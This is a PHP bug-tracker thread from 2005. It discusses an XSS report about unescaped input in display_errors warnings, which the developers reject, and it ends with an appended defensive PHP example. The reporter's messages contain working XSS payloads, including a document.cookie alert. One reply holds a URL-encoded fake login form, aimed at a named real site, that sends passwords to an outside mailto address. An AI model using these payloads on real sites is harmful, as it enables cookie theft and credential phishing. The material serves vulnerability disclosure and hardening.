Bug #33173 Bug in PHP 4.3.11 display_error.
Submitted: 2005-05-28 16:57 UTC Modified: 2005-05-30 19:52 UTC
From: max at jestsuper dot pl Assigned:
Status: Not a bug Package: *General Issues
PHP Version: * OS: *
Private report: No CVE-ID: None
 [2005-05-28 16:57 UTC] max at jestsuper dot pl
Description:
------------
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Author: cXIb8O3(Maksymilian Arciemowicz)
Date: 28.5.2005
from securityreason.com TEAM

- --- 0. Bug in PHP 4.3.11 display_error. ---

This bug can be dangerous, because someone can do XSS and phishing attacks.
The problem exists in display_errors.

Example php script:

<?php
include($_GET['varible']);
?>

and now the request is

?varible=XXX

so we can see the error.

- ---
Warning: main(XXX): failed to open stream: No such file or directory in /www/dupa.php on line 2

Warning: main(): Failed opening 'XXX' for inclusion (include_path='.:') in /www/dupa.php on line 2
- ---

Normal. But now varible has, for example, <h1>SR</h1>
And the error messages are:

- ---
Warning: main(
SR
): failed to open stream: No such file or directory in /www/dupa.php on line 2

Warning: main(): Failed opening '<h1>SR</h1>' for inclusion (include_path='.:') in /www/dupa.php on line 2
- ---

So XSS...

Dangerous tags can be <script> and <iframe>, because you can see cookies etc.
For example:

?varible=<script>alert(document.cookie);</script>

And you have the cookies from this domain!

This XSS is critical, because it exists in display_error and a hacker can do XSS and phishing attacks.
For example, if this bug exists in a bank site... a hacker can create a <FORM> or mirror site...

- --- 1. Contact ---
Author: Maksymilian Arciemowicz < cXIb8O3 >
Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com
GPG-KEY: securityreason.com TEAM
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.1 (FreeBSD)

iD8DBQFCmIWvznmvyJCR4zQRAuqtAKCcyXWQnMdPvCn+6+npQiGEbXvAZwCgq172
+J8w9EzGFE49sXxP1MPbSfI=
=QksY
-----END PGP SIGNATURE-----


Actual result:
--------------
XSS

 [2005-05-28 19:02 UTC] helly@php.net
Thank you for taking the time to write to us, but this is not
a bug. Please double-check the documentation available at
http://www.php.net/manual/ and the instructions on how to report
a bug at http://bugs.php.net/how-to-report.php

You're not supposed to pass the error information to your users. Showing errors is only a convenience thing to aid you while developing. Thus no user will ever see such error messages. So in the end it is not usable for phishing and alike.
 [2005-05-30 18:56 UTC] max at jestsuper dot pl
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

>  ID:               33173
>  Updated by:       helly@php.net
>  Reported By:      max at jestsuper dot pl
> -Status:           Open
> +Status:           Bogus
>  Bug Type:         *General Issues
> -Operating System: FreeBSD
> +Operating System: *
> -PHP Version:      4.3.11
> +PHP Version:      *
>  New Comment:
>
> Thank you for taking the time to write to us, but this is not
> a bug.

This is a bug [XSS].

> Please double-check the documentation available at 
> http://www.php.net/manual/ and the instructions on how to report
> a bug at http://bugs.php.net/how-to-report.php

Ok. But this bug still exists, if (html_errors false) etc.

>
> You're not supposed to pass the error information to your users. Show
> erros is only a convenience thing to aid you while developing. Thus no
> user will ever see such error messages. So in the end it is not usable
> for phishing and alike.

It is.. ;] That can be very dangerous. For example phishing. This is XSS!
So ok. Example newweb.wrh.noaa.gov

http://newweb.wrh.noaa.gov/pdt/prototype/gfeGraphics/gfeGraphics.php?imgSource=%3CP%3E%3Cfont%20color=red%3E%3CP%3E%3Ch1%3EWARNING!%20SYSTEM%20ERROR%3CBR%3EPlease%20login:
%3C/h1%3E%3C/font%3E%3Cfont%20size=-4%3E%3C/center%3E%20%3CFORM%20METHOD=POST%20ACTION=mailto:haker@blabla.pl%3E%3CP%3ELOGIN:
%3CINPUT%20TYPE=text%20NAME=login%20SIZE=9%3E%3CP%3EPASSWORD:
%3CINPUT%20TYPE=password%20NAME=passwd%20SIZE=9%3E%3CP%3E%3Cinput%20type=submit%20name=go%20value=Login%3E%3C/form%3E%3Cfont%20color=white%3E

http://newweb.wrh.noaa.gov/pdt/prototype/gfeGraphics/gfeGraphics.php?imgSource=<iframe 
src=http://newweb.wrh.noaa.gov>

But PHP errors (Warning) can be in a BANK site... and you can create a form ...
phishing!

Tell me what is wrong. Thx

SecurityReason.Com
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.1 (FreeBSD)

iD8DBQFCmjvuznmvyJCR4zQRApfYAKCHEknKWRw8zchV6qIwkM0DZt9JNQCfRvcm
IDvuoOSzh75uSA9A1xnFiYc=
=S4rb
-----END PGP SIGNATURE-----
 [2005-05-30 19:52 UTC] johannes@php.net
Here we have two errors:

a) letting unchecked data be used as a filename
b) showing plain errors to the user

about a) _every_ input data needs to be checked. Or we
would need to remove eval since some user might do an
eval($_GET['code'])

about b) as Marcus wrote you shouldn't show plain error
messages to your users. This for two reasons: first the
user doesn't understand what's wrong and might think he's
too stupid and second for a bit of security, if some
bad guy doesn't know where a GET-value is used he has
limited chance in finding an exploit.

And a further note: changing the filename for the error
message might also make debugging harder since the name
shown isn't exactly the one used so it might be harder to
track the reason
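As an added, defender-side example (not code from the bug report, from either PHP developer's comment, or from the PHP project), the following script is a hardened counterpart of the report's one-line include($_GET['varible']) page. It covers both points raised in the last comment: the request value is only an allowlist key and never a filename (point a), and errors are logged instead of displayed, so no warning text carrying raw input reaches the browser (point b). The parameter name page, the pages/ directory, and the three page files are assumptions.

```php
<?php
// Added example, not code from bug #33173 or from PHP itself.
// Hardened counterpart of the report's  include($_GET['varible']);
//   a) request data is never used as a filename: the value is only an
//      allowlist key, so "<h1>SR</h1>" or "../x" can never reach include()
//   b) errors are logged, not displayed, so no warning text (which embeds
//      the raw input) is ever sent to the browser
declare(strict_types=1);

// Production error settings. Prefer php.ini / vhost config; ini_set() here
// only covers errors raised after this line runs.
ini_set('display_errors', '0');   // the reported pages effectively had this on
ini_set('log_errors', '1');

// a) Allowlist of opaque keys -> fixed files. Paths are assumptions.
const PAGES = [
    'home'    => __DIR__ . '/pages/home.php',
    'about'   => __DIR__ . '/pages/about.php',
    'contact' => __DIR__ . '/pages/contact.php',
];

// Returns the file for a known key, or null for anything else.
// The input is a lookup key, never part of a path.
function resolvePage(string $requested): ?string
{
    return PAGES[$requested] ?? null;
}

// If untrusted text must ever be reflected into HTML, entity-encode it:
// "<h1>SR</h1>" becomes "&lt;h1&gt;SR&lt;/h1&gt;" and renders as text.
function escapeForHtml(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// b) Defence in depth: even if display_errors were on, route non-fatal
// errors to the log (newlines stripped to keep one event per line) and
// return true so PHP does not print its own message.
set_error_handler(function (int $errno, string $errstr, string $errfile, int $errline): bool {
    $oneLine = str_replace(["\r", "\n"], ' ', $errstr);
    error_log(sprintf('php error %d: %s in %s:%d', $errno, $oneLine, $errfile, $errline));
    return true;
});

$requested = (isset($_GET['page']) && is_string($_GET['page'])) ? $_GET['page'] : 'home';
$file = resolvePage($requested);

if ($file === null || !is_file($file)) {
    // The operator sees what was rejected (URL-encoded, so log viewers and
    // log-based dashboards never render it); the user sees a fixed message.
    error_log('rejected page parameter: ' . rawurlencode($requested));
    http_response_code(404);
    echo 'Page not found.';
    exit;
}

include $file;
```

With the allowlist in place, an unknown key never reaches include(), so no "failed to open stream" warning is raised for this script at all; the display_errors setting and the error handler still matter for the rest of the application. Note that set_error_handler() does not intercept fatal errors, so the ini directive (ideally in php.ini, not at runtime) remains the primary control for point b.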